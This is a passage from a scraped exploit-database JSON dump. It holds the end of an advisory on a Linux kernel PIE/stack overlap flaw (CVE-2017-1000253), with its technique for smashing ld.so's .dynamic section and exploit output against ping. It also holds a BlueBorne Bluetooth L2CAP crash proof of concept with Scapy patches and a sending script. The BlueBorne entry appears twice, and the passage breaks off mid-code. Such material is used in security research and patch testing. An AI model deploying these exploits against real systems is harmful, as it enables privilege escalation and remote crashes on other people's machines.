\r\n7ffbaa6c9000-7ffbaa6ca000 r--p 00001000 fd:00 4194375 /tmp/PIE\r\n7ffbaa6ca000-7ffbaa6eb000 rw-p 00002000 fd:00 4194375 /tmp/PIE\r\n7ffbaa7eb000-7ffc0a6eb000 rw-p 00000000 00:00 0 [heap]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\r\nrsp 0x7ffbaa6d1c18\r\n\r\nIn this example, the kernel's execve() code also mapped the PIE's\r\nread-write segment into the stack memory region, and divided the stack\r\ninto three parts, but:\r\n\r\n- 7ffbaa5ca000-7ffbaa6c9000, the lowest part of the stack, is not\r\n displayed as the \"[stack]\" in /proc/pid/maps (because rsp does not\r\n point there), but is correctly flagged as a stack in /proc/pid/smaps;\r\n\r\n- 7ffbaa6c9000-7ffbaa6eb000, the middle part of the stack, was replaced\r\n by the PIE's read-write segment, and is where rsp points to, after\r\n execve() returns to the userland;\r\n\r\n- 7ffbaa7eb000-7ffc0a6eb000, the highest part of the stack, is (again)\r\n incorrectly displayed as the \"[heap]\" in /proc/pid/maps, but is\r\n correctly flagged as a stack in /proc/pid/smaps.\r\n\r\nOlder kernels (such as \"3.10.0-514.21.1.el7.x86_64\") and newer kernels\r\n(such as \"3.10.0-514.26.2.el7.x86_64\"), other distributions and other\r\nprivileged PIEs (including SUID-root PIEs), are also exploitable, but\r\nthe exploitation method must be adapted to slightly different PIE/stack\r\nlayouts. This is left as an exercise for the interested reader.\r\n\r\n\r\n========================================================================\r\nExploitation\r\n========================================================================\r\n\r\nOur CVE-2017-1000253.c exploit for CentOS-7 kernel versions\r\n\"3.10.0-514.21.2.el7.x86_64\" and \"3.10.0-514.26.1.el7.x86_64\" is very\r\nsimilar to our stack-clash exploit Linux_ldso_dynamic.c (we smash the\r\nPIE's .dynamic section with a stack-based string operation, and force\r\nld.so to load and execute our own shared library), but with two\r\nimportant differences:\r\n\r\n- we do not need to jump over the stack guard-page, because rsp\r\n naturally points into the PIE's read-write segment after we trigger\r\n CVE-2017-1000253;\r\n\r\n- on 64-bit, all .dynamic tags contain null-bytes, a serious problem if\r\n we want to smash the .dynamic section with a null-terminated string.\r\n\r\nTo solve this problem, we smash the .dynamic section with multiple calls\r\nto process_dl_debug(), a function called by process_envvars() very early\r\nin dl_main(), before elf_get_dynamic_info() parses the .dynamic section.\r\nprocess_dl_debug() is called for each LD_DEBUG environment variable, and\r\ncalls strndupa() (strnlen(), alloca(), memcpy()) for each unknown option\r\nin LD_DEBUG, thus allowing us to smash the .dynamic section with\r\nmultiple null-terminated strings, and hence multiple null-bytes.\r\n\r\nUnfortunately, the .dynamic entries that we build on the stack with\r\nprocess_dl_debug():\r\n\r\n- DT_SYMTAB (tag 0x0000000000000006, value unused);\r\n\r\n- DT_STRTAB (tag 0x0000000000000005), an offset (into the PIE's\r\n read-execute segment) to our own .dynstr section -- this is later\r\n transformed by elf_get_dynamic_info() into an absolute address,\r\n allowing us to bypass ASLR;\r\n\r\n- DT_NEEDED (tag 0x0000000000000001), an offset (into our .dynstr\r\n section) to the pathname of our own shared library -- we use offset\r\n 0x238+1 into the PIE's read-execute segment, where the string\r\n \"lib64/ld-linux-x86-64.so.2\" is always stored;\r\n\r\n- DT_NULL (tag 0x0000000000000000, value unused);\r\n\r\nare partially destroyed by the stack-frames of further function calls\r\n(_dl_error_printf(), for example). Our solution to this problem is very\r\nspecific to CentOS 7, and restricts this particular exploit to the PIEs\r\nwhose .dynamic section's address modulo 16 is equal to 8:\r\n\r\n- we build our .dynamic tags through a stack variable used by memcpy()\r\n to store the address modulo 16 of the unknown options in LD_DEBUG;\r\n\r\n- we store our .dynamic values in an unused slot of process_dl_debug()'s\r\n stack-frame.\r\n\r\nOne last, unexpected problem with this particular exploit is that rsp\r\ncan never point into the highest part of the stack (after the kernel's\r\nexecve() code divided the stack into three parts): indeed, the kernel's\r\npage-fault handler would then try to insert a stack guard-page below the\r\nhighest part of the stack, and would SIGKILL our process because the\r\nPIE's read-write segment is already mapped there.\r\n\r\nThe solution to this problem is simple, but further restricts this\r\nparticular exploit to the PIEs whose read-write segment is large enough\r\nto encompass rsp: the kernel's page-fault handler will not try to insert\r\na stack guard-page there, because the PIE's read-write segment is not\r\nflagged as a stack (VM_GROWSDOWN). For example, on a default, minimal\r\nCentOS 7, ping is privileged (cap_net_admin and cap_net_raw) and\r\nexploitable:\r\n\r\n[[email\u00a0protected] tmp]$ getcap -r / 2>/dev/null\r\n/usr/bin/ping = cap_net_admin,cap_net_raw+p\r\n...\r\n\r\n[[email\u00a0protected] tmp]$ readelf -a /usr/bin/ping\r\n...\r\n Type Offset VirtAddr PhysAddr\r\n FileSiz MemSiz Flags Align\r\n...\r\n LOAD 0x000000000000da58 0x000000000020da58 0x000000000020da58\r\n 0x0000000000000988 0x00000000000241e8 RW 200000\r\n DYNAMIC 0x000000000000da78 0x000000000020da78 0x000000000020da78\r\n 0x0000000000000240 0x0000000000000240 RW 8\r\n...\r\n\r\n[[email\u00a0protected] tmp]$ ./CVE-2017-1000253 /usr/bin/ping\r\nargv_size 101903\r\nsmash_size 36864\r\nhi_smash_size 18432\r\nlo_smash_size 18432\r\nprobability 1/16028\r\ntry 1 1.409649 exited 2\r\ntry 2 1.097508 exited 2\r\ntry 3 1.060084 exited 2\r\ntry 4 1.059042 exited 2\r\ntry 5 1.090841 exited 2\r\ntry 6 1.068993 exited 2\r\ntry 7 1.093662 exited 2\r\n...\r\ntry 3411 1.018799 exited 2\r\ntry 3412 1.022255 exited 2\r\ntry 3413 1.022062 exited 2\r\ntry 3414 1.061316 exited 2\r\ntry 3415 1.024066 exited 2\r\ntry 3416 1.024864 exited 2\r\ntry 3417 1.043867 exited 2\r\nPid: 6301\r\nUid: 1000 1000 1000\r\nGid: 1000 1000 1000\r\nCapInh: 0000000000000000\r\nCapPrm: 0000000000003000\r\nCapEff: 0000000000000000\r\n\r\n[[email\u00a0protected] tmp]# cat /proc/6301/status\r\nName: ping\r\n...\r\nPid: 6301\r\n...\r\nUid: 1000 1000 1000 1000\r\nGid: 1000 1000 1000 1000\r\n...\r\nCapInh: 0000000000000000\r\nCapPrm: 0000000000003000\r\nCapEff: 0000000000000000\r\n...\r\n\r\n[[email\u00a0protected] tmp]# cat /proc/6301/maps\r\n7ffbc573d000-7ffbc58f4000 r-xp 00000000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc58f4000-7ffbc5af3000 ---p 001b7000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc5af3000-7ffbc5af7000 r--p 001b6000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc5af7000-7ffbc5af9000 rw-p 001ba000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc5af9000-7ffbc5afe000 rw-p 00000000 00:00 0 \r\n7ffbc5afe000-7ffbc5aff000 r-xp 00000000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5aff000-7ffbc5cfe000 ---p 00001000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5cfe000-7ffbc5cff000 r--p 00000000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5cff000-7ffbc5d00000 rw-p 00001000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5d00000-7ffbc5d20000 r-xp 00000000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbc5f15000-7ffbc5f18000 rw-p 00000000 00:00 0 \r\n7ffbc5f1c000-7ffbc5f1e000 rw-p 00000000 00:00 0 \r\n7ffbc5f1e000-7ffbc5f20000 r-xp 00000000 00:00 0 [vdso]\r\n7ffbc5f20000-7ffbc5f21000 r--p 00020000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbc5f21000-7ffbc5f22000 rw-p 00021000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbc5f22000-7ffbc5f23000 rw-p 00000000 00:00 0 \r\n7ffbc5f23000-7ffbc5f31000 r-xp 00000000 fd:00 12968754 /usr/bin/ping\r\n7ffbc6031000-7ffbc6130000 rw-p 00000000 00:00 0 \r\n7ffbc6130000-7ffbc6131000 r--p 0000d000 fd:00 12968754 /usr/bin/ping\r\n7ffbc6131000-7ffbc6132000 rw-p 0000e000 fd:00 12968754 /usr/bin/ping\r\n7ffbc6132000-7ffbc6155000 rw-p 00000000 00:00 0 [stack]\r\n7ffbc6255000-7ffc29988000 rw-p 00000000 00:00 0 [heap]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\r\n\r\n[[email\u00a0protected] tmp]# gdb /usr/bin/ping 6301\r\n...\r\n(gdb) x/16384xg 0x7ffbc6130000 + 8\r\n0x7ffbc6130008: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130018: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130028: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130038: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130048: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130058: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130068: 0x4141414141414141 0x4141414141414141\r\n...\r\n0x7ffbc6132678: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132688: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132698: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326a8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326b8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326c8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326d8: 0x4141414141414141 0x00007ffbc6132700\r\n0x7ffbc61326e8: 0x00007ffbc5d01463 0x4141414141410041\r\n0x7ffbc61326f8: 0x0000000000000005 0x888908844e7ab888\r\n0x7ffbc6132708: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc6132718: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132728: 0x0041414141414141 0x00007ffbc6132740\r\n0x7ffbc6132738: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc6132748: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132758: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132768: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132778: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132788: 0x4141414141414141 0x00007ffbc6132700\r\n0x7ffbc6132798: 0x00007ffbc5d01463 0x4141414141410041\r\n0x7ffbc61327a8: 0x0000000000000001 0x77777777777779b1\r\n0x7ffbc61327b8: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc61327c8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61327d8: 0x0041414141414141 0x00007ffbc61327f0\r\n0x7ffbc61327e8: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc61327f8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132808: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132818: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132828: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132838: 0x4141414141414141 0x00007ffbc6132800\r\n0x7ffbc6132848: 0x00007ffbc5d01463 0x4141414141410041\r\n0x7ffbc6132858: 0x0000000000000006 0x4848c8440e3a7848\r\n0x7ffbc6132868: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc6132878: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132888: 0x0000000000000000 0x00007ffbc61328a0\r\n0x7ffbc6132898: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc61328a8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328b8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328c8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328d8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328e8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328f8: 0x4141414141414141 0x4141414141414141\r\n...\r\n(gdb) x/s 0x888908844e7ab888 + 0x77777777777779b1\r\n0x7ffbc5f23239: \"lib64/ld-linux-x86-64.so.2\"\r\n\r\n\r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n\r\nWe thank Red Hat and the members of the [email\u00a0protected] list.\n\n# 0day.today [2018-02-16] #", "sourceHref": "https://0day.today/exploit/28745", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-05T05:24:23", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2017-09-21T00:00:00", "type": "zdt", "title": "Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10002"], "modified": "2017-09-21T00:00:00", "id": "1337DAY-ID-28596", "href": "https://0day.today/exploit/description/28596", "sourceData": "# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -\r\nDoS (Crash) only\r\n# Date: 09/21/2017\r\n# Exploit Author: Marcin Kozlowski <[email\u00a0protected]>\r\n# Version: Kernel version v3.3-rc1, and thus affects all version from there on\r\n# Tested on: Linux 4.4.0-93-generic #116\r\n# CVE : CVE-2017-1000251\r\n \r\n# Provided for legal security research and testing purposes ONLY.\r\n \r\n \r\n \r\nProof of Concept - Crash Only - Unarmed/Unweaponized/No Payload\r\n \r\nAfter reading tons of Documentation and Protocol specifications.\r\n \r\n \r\n1) Install Scapy\r\n \r\nhttps://github.com/secdev/scapy\r\n \r\n \r\nAdd/Replace these requests and responses in Bluetooth Protocol stack to these:\r\n \r\n \r\nscapy/layers/bluetooth.py\r\n \r\nclass L2CAP_ConfReq(Packet):\r\n name = \"L2CAP Conf Req\"\r\n fields_desc = [ LEShortField(\"dcid\",0),\r\n LEShortField(\"flags\",0),\r\n ByteField(\"type\",0),\r\n ByteField(\"length\",0),\r\n ByteField(\"identifier\",0),\r\n ByteField(\"servicetype\",0),\r\n LEShortField(\"sdusize\",0),\r\n LEIntField(\"sduarrtime\",0),\r\n LEIntField(\"accesslat\",0),\r\n LEIntField(\"flushtime\",0),\r\n ]\r\n \r\n \r\n \r\nclass L2CAP_ConfResp(Packet):\r\n name = \"L2CAP Conf Resp\"\r\n fields_desc = [ LEShortField(\"scid\",0),\r\n LEShortField(\"flags\",0),\r\n LEShortField(\"result\",0),\r\n ByteField(\"type0\",0),\r\n ByteField(\"length0\",0),\r\n LEShortField(\"option0\",0),\r\n ByteField(\"type1\",0),\r\n ByteField(\"length1\",0),\r\n LEShortField(\"option1\",0),\r\n ByteField(\"type2\",0),\r\n ByteField(\"length2\",0),\r\n LEShortField(\"option2\",0),\r\n ByteField(\"type3\",0),\r\n ByteField(\"length3\",0),\r\n LEShortField(\"option3\",0),\r\n ByteField(\"type4\",0),\r\n ByteField(\"length4\",0),\r\n LEShortField(\"option4\",0),\r\n ByteField(\"type5\",0),\r\n ByteField(\"length5\",0),\r\n LEShortField(\"option5\",0),\r\n ByteField(\"type6\",0),\r\n ByteField(\"length6\",0),\r\n LEShortField(\"option6\",0),\r\n ByteField(\"type7\",0),\r\n ByteField(\"length7\",0),\r\n LEShortField(\"option7\",0),\r\n ByteField(\"type8\",0),\r\n ByteField(\"length8\",0),\r\n LEShortField(\"option8\",0),\r\n ByteField(\"type9\",0),\r\n ByteField(\"length9\",0),\r\n LEShortField(\"option9\",0),\r\n ByteField(\"type10\",0),\r\n ByteField(\"length10\",0),\r\n LEShortField(\"option10\",0),\r\n ByteField(\"type11\",0),\r\n ByteField(\"length11\",0),\r\n LEShortField(\"option11\",0),\r\n ByteField(\"type12\",0),\r\n ByteField(\"length12\",0),\r\n LEShortField(\"option12\",0),\r\n ByteField(\"type13\",0),\r\n ByteField(\"length13\",0),\r\n LEShortField(\"option13\",0),\r\n ByteField(\"type14\",0),\r\n ByteField(\"length14\",0),\r\n LEShortField(\"option14\",0),\r\n ByteField(\"type15\",0),\r\n ByteField(\"length15\",0),\r\n LEShortField(\"option15\",0),\r\n ByteField(\"type16\",0),\r\n ByteField(\"length16\",0),\r\n LEShortField(\"option16\",0),\r\n ByteField(\"type17\",0),\r\n ByteField(\"length17\",0),\r\n LEShortField(\"option17\",0),\r\n ByteField(\"type18\",0),\r\n ByteField(\"length18\",0),\r\n LEShortField(\"option18\",0),\r\n ByteField(\"type19\",0),\r\n ByteField(\"length19\",0),\r\n LEShortField(\"option19\",0),\r\n ByteField(\"type20\",0),\r\n ByteField(\"length20\",0),\r\n LEShortField(\"option20\",0),\r\n ByteField(\"type21\",0),\r\n ByteField(\"length21\",0),\r\n LEShortField(\"option21\",0),\r\n ByteField(\"type22\",0),\r\n ByteField(\"length22\",0),\r\n LEShortField(\"option22\",0),\r\n ByteField(\"type23\",0),\r\n ByteField(\"length23\",0),\r\n LEShortField(\"option23\",0),\r\n ByteField(\"type24\",0),\r\n ByteField(\"length24\",0),\r\n LEShortField(\"option24\",0),\r\n ByteField(\"type25\",0),\r\n ByteField(\"length25\",0),\r\n LEShortField(\"option25\",0),\r\n ByteField(\"type26\",0),\r\n ByteField(\"length26\",0),\r\n LEShortField(\"option26\",0),\r\n ByteField(\"type27\",0),\r\n ByteField(\"length27\",0),\r\n LEShortField(\"option27\",0),\r\n ByteField(\"type28\",0),\r\n ByteField(\"length28\",0),\r\n LEShortField(\"option28\",0),\r\n ByteField(\"type29\",0),\r\n ByteField(\"length29\",0),\r\n LEShortField(\"option29\",0),\r\n ByteField(\"type30\",0),\r\n ByteField(\"length30\",0),\r\n LEShortField(\"option30\",0),\r\n ByteField(\"type31\",0),\r\n ByteField(\"length31\",0),\r\n LEShortField(\"option31\",0),\r\n ByteField(\"type32\",0),\r\n ByteField(\"length32\",0),\r\n LEShortField(\"option32\",0),\r\n ByteField(\"type33\",0),\r\n ByteField(\"length33\",0),\r\n LEShortField(\"option33\",0),\r\n ByteField(\"type34\",0),\r\n ByteField(\"length34\",0),\r\n LEShortField(\"option34\",0),\r\n ByteField(\"type35\",0),\r\n ByteField(\"length35\",0),\r\n LEShortField(\"option35\",0),\r\n ByteField(\"type36\",0),\r\n ByteField(\"length36\",0),\r\n LEShortField(\"option36\",0),\r\n ByteField(\"type37\",0),\r\n ByteField(\"length37\",0),\r\n LEShortField(\"option37\",0),\r\n ByteField(\"type38\",0),\r\n ByteField(\"length38\",0),\r\n LEShortField(\"option38\",0),\r\n ByteField(\"type39\",0),\r\n ByteField(\"length39\",0),\r\n LEShortField(\"option39\",0),\r\n ByteField(\"type40\",0),\r\n ByteField(\"length40\",0),\r\n LEShortField(\"option40\",0),\r\n ByteField(\"type41\",0),\r\n ByteField(\"length41\",0),\r\n LEShortField(\"option41\",0),\r\n ByteField(\"type42\",0),\r\n ByteField(\"length42\",0),\r\n LEShortField(\"option42\",0),\r\n ByteField(\"type43\",0),\r\n ByteField(\"length43\",0),\r\n LEShortField(\"option43\",0),\r\n ByteField(\"type44\",0),\r\n ByteField(\"length44\",0),\r\n LEShortField(\"option44\",0),\r\n ByteField(\"type45\",0),\r\n ByteField(\"length45\",0),\r\n LEShortField(\"option45\",0),\r\n ByteField(\"type46\",0),\r\n ByteField(\"length46\",0),\r\n LEShortField(\"option46\",0),\r\n ByteField(\"type47\",0),\r\n ByteField(\"length47\",0),\r\n LEShortField(\"option47\",0),\r\n ByteField(\"type48\",0),\r\n ByteField(\"length48\",0),\r\n LEShortField(\"option48\",0),\r\n ByteField(\"type49\",0),\r\n ByteField(\"length49\",0),\r\n LEShortField(\"option49\",0),\r\n ByteField(\"type50\",0),\r\n ByteField(\"length50\",0),\r\n LEShortField(\"option50\",0),\r\n ByteField(\"type51\",0),\r\n ByteField(\"length51\",0),\r\n LEShortField(\"option51\",0),\r\n ByteField(\"type52\",0),\r\n ByteField(\"length52\",0),\r\n LEShortField(\"option52\",0),\r\n ByteField(\"type53\",0),\r\n ByteField(\"length53\",0),\r\n LEShortField(\"option53\",0),\r\n ByteField(\"type54\",0),\r\n ByteField(\"length54\",0),\r\n LEShortField(\"option54\",0),\r\n ByteField(\"type55\",0),\r\n ByteField(\"length55\",0),\r\n LEShortField(\"option55\",0),\r\n ByteField(\"type56\",0),\r\n ByteField(\"length56\",0),\r\n LEShortField(\"option56\",0),\r\n ByteField(\"type57\",0),\r\n ByteField(\"length57\",0),\r\n LEShortField(\"option57\",0),\r\n ByteField(\"type58\",0),\r\n ByteField(\"length58\",0),\r\n LEShortField(\"option58\",0),\r\n ByteField(\"type59\",0),\r\n ByteField(\"length59\",0),\r\n LEShortField(\"option59\",0),\r\n ByteField(\"type60\",0),\r\n ByteField(\"length60\",0),\r\n LEShortField(\"option60\",0),\r\n ByteField(\"type61\",0),\r\n ByteField(\"length61\",0),\r\n LEShortField(\"option61\",0),\r\n ByteField(\"type62\",0),\r\n ByteField(\"length62\",0),\r\n LEShortField(\"option62\",0),\r\n ByteField(\"type63\",0),\r\n ByteField(\"length63\",0),\r\n LEShortField(\"option63\",0),\r\n ByteField(\"type64\",0),\r\n ByteField(\"length64\",0),\r\n LEShortField(\"option64\",0),\r\n ByteField(\"type65\",0),\r\n ByteField(\"length65\",0),\r\n LEShortField(\"option65\",0),\r\n ByteField(\"type66\",0),\r\n ByteField(\"length66\",0),\r\n LEShortField(\"option66\",0),\r\n ByteField(\"type67\",0),\r\n ByteField(\"length67\",0),\r\n LEShortField(\"option67\",0),\r\n ByteField(\"type68\",0),\r\n ByteField(\"length68\",0),\r\n LEShortField(\"option68\",0),\r\n ByteField(\"type69\",0),\r\n ByteField(\"length69\",0),\r\n LEShortField(\"option69\",0),\r\n ]\r\n \r\n \r\n2) Exploit\r\n \r\n \r\nbluebornexploit.py\r\n------------------------\r\n \r\nfrom scapy.all import *\r\n \r\npkt = L2CAP_CmdHdr(code=4)/\r\nL2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)\r\n \r\n \r\npkt1 = L2CAP_CmdHdr(code=5)/\r\nL2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)\r\n \r\n \r\nbt = BluetoothL2CAPSocket(\"00:1A:7D:DA:71:13\")\r\n \r\nbt.send(pkt)\r\nbt.send(pkt1)\r\n \r\n \r\nbluetoothsrv.py\r\n--------------------\r\n \r\nfrom scapy.all import *\r\n \r\nbt = BluetoothL2CAPSocket(\"01:02:03:04:05:06\")\r\n \r\nbt.recv()\r\n \r\n \r\n \r\n \r\nDEMO:\r\nhttps://imgur.com/a/zcvLb\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/28596", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-06T09:18:17", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2017-09-21T00:00:00", "type": "zdt", "title": "BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS (Crash) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10002"], "modified": "2017-09-21T00:00:00", "id": "1337DAY-ID-28593", "href": "https://0day.today/exploit/description/28593", "sourceData": "# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS (Crash) only\r\n# Date: 09/21/2017\r\n# Exploit Author: Marcin Kozlowski <[email\u00a0protected]>\r\n# Version: Kernel version v3.3-rc1, and thus affects all version from there on\r\n# Tested on: Linux 4.4.0-93-generic #116\r\n# CVE : CVE-2017-1000251\r\n\r\n# Provided for legal security research and testing purposes ONLY.\r\n\r\n\r\n\r\nProof of Concept - Crash Only - Unarmed/Unweaponized/No Payload\r\n\r\nAfter reading tons of Documentation and Protocol specifications.\r\n\r\n\r\n1) Install Scapy\r\n\r\n\r\nhttps://github.com/secdev/scapy\r\n\r\n\r\nAdd/Replace these requests and responses in Bluetooth Protocol stack to these:\r\n\r\n\r\nscapy/layers/bluetooth.py\r\n\r\nclass L2CAP_ConfReq(Packet):\r\n name = \"L2CAP Conf Req\"\r\n fields_desc = [ LEShortField(\"dcid\",0),\r\n LEShortField(\"flags\",0),\r\n ByteField(\"type\",0),\r\n ByteField(\"length\",0),\r\n ByteField(\"identifier\",0),\r\n ByteField(\"servicetype\",0),\r\n LEShortField(\"sdusize\",0),\r\n LEIntField(\"sduarrtime\",0),\r\n LEIntField(\"accesslat\",0),\r\n LEIntField(\"flushtime\",0),\r\n ]\r\n\r\n\r\n\r\nclass L2CAP_ConfResp(Packet):\r\n name = \"L2CAP Conf Resp\"\r\n fields_desc = [ LEShortField(\"scid\",0),\r\n LEShortField(\"flags\",0),\r\n LEShortField(\"result\",0),\r\n ByteField(\"type0\",0),\r\n ByteField(\"length0\",0),\r\n LEShortField(\"option0\",0),\r\n ByteField(\"type1\",0),\r\n ByteField(\"length1\",0),\r\n LEShortField(\"option1\",0),\r\n ByteField(\"type2\",0),\r\n ByteField(\"length2\",0),\r\n LEShortField(\"option2\",0),\r\n ByteField(\"type3\",0),\r\n ByteField(\"length3\",0),\r\n LEShortField(\"option3\",0),\r\n ByteField(\"type4\",0),\r\n ByteField(\"length4\",0),\r\n LEShortField(\"option4\",0),\r\n ByteField(\"type5\",0),\r\n ByteField(\"length5\",0),\r\n LEShortField(\"option5\",0),\r\n ByteField(\"type6\",0),\r\n ByteField(\"length6\",0),\r\n LEShortField(\"option6\",0),\r\n ByteField(\"type7\",0),\r\n ByteField(\"length7\",0),\r\n LEShortField(\"option7\",0),\r\n ByteField(\"type8\",0),\r\n ByteField(\"length8\",0),\r\n LEShortField(\"option8\",0),\r\n ByteField(\"type9\",0),\r\n ByteField(\"length9\",0),\r\n LEShortField(\"option9\",0),\r\n ByteField(\"type10\",0),\r\n ByteField(\"length10\",0),\r\n LEShortField(\"option10\",0),\r\n ByteField(\"type11\",0),\r\n ByteField(\"length11\",0),\r\n LEShortField(\"option11\",0),\r\n ByteField(\"type12\",0),\r\n ByteField(\"length12\",0),\r\n LEShortField(\"option12\",0),\r\n ByteField(\"type13\",0),\r\n ByteField(\"length13\",0),\r\n LEShortField(\"option13\",0),\r\n ByteField(\"type14\",0),\r\n ByteField(\"length14\",0),\r\n LEShortField(\"option14\",0),\r\n ByteField(\"type15\",0),\r\n ByteField(\"length15\",0),\r\n LEShortField(\"option15\",0),\r\n ByteField(\"type16\",0),\r\n ByteField(\"length16\",0),\r\n LEShortField(\"option16\",0),\r\n ByteField(\"type17\",0),\r\n ByteField(\"length17\",0),\r\n LEShortField(\"option17\",0),\r\n ByteField(\"type18\",0),\r\n ByteField(\"length18\",0),\r\n LEShortField(\"option18\",0),\r\n ByteField(\"type19\",0),\r\n ByteField(\"length19\",0),\r\n LEShortField(\"option19\",0),\r\n ByteField(\"type20\",0),\r\n ByteField(\"length20\",0),\r\n LEShortField(\"option20\",0),\r\n ByteField(\"type21\",0),\r\n ByteField(\"length21\",0),\r\n LEShortField(\"option21\",0),\r\n ByteField(\"type22\",0),\r\n ByteField(\"length22\",0),\r\n LEShortField(\"option22\",0),\r\n ByteField(\"type23\",0),\r\n ByteField(\"length23\",0),\r\n LEShortField(\"option23\",0),\r\n ByteField(\"type24\",0),\r\n ByteField(\"length24\",0),\r\n LEShortField(\"option24\",0),\r\n ByteField(\"type25\",0),\r\n 